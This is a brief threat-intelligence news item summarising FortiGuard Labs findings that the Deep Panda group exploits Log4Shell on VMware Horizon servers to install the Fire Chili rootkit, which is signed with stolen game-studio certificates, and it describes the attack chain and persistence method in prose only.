Deep Panda & Fire Chili Rootkits

Chinese APT group, Deep Panda has been identified by researchers at FortiGuard Labs to be exploiting the Log4Shell vulnerability utilizing a new digitally signed rootkit dubbed Fire Chili. The certificates are stolen from game development companies Frostburn Studios and Korean 433CCR Company. The attack chain begins with a Log4Shell exploit on a vulnerable VMWare Horizon server that spawns an encoded PowerShell command to download and execute scripts, completing with a malicious DLL file being installed. Persistence is achieved by creating a service and registry entry. The Fire Chili rootkit has currently been scoring low based on VirusTotal review.